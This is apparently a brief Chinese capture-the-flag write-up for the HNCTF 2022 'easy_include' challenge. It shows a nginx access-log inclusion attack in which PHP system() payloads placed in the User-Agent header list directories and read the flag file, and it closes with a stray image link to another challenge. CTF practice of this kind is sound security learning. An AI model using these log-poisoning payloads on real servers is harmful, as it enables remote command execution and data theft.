NSS [HNCTF 2022 WEEK2]easy_include
过滤好多,试试日志包含。
服务器是nginx
?file=/var/log/nginx/access.log
修改UA头为<?php system(‘ls’); ?>
修改UA头为<?php system(‘ls /’); ?>
修改UA头为<?php system('tac /ffflllaaaggg'); ?>
![BUUCTF [SWPU2019]我有一只马里奥 1](https://ucc.alicdn.com/pic/developer-ecology/tycxnpqmgloi4_2fcff14df403426e9172d8c4553f958d.png?x-oss-process=image/format,webp/resize,h_160,m_lfit)